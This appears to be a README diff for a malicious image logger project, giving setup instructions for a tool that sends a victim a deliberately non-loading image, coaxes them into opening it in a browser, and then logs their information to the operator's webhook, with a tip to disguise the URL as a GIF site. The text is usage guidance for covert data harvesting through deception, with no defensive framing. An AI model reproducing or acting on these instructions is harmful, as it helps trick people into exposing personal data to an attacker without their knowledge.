beamerkz/OBLIVION/README.md

 For it to work, at the start the image. when sent will NOT load ON PURPOSE. tell them to open it on a search engine then it will log all theyre info and sent it too your webhook.

-You will need to change two lines of code, changing the webhook and the picture it will show them when opened.
+You will need to change two lines of code, changing the webhook and the picture it will show them when opened. for "name your file, make sure you do /api then /tenor or any website with gifs.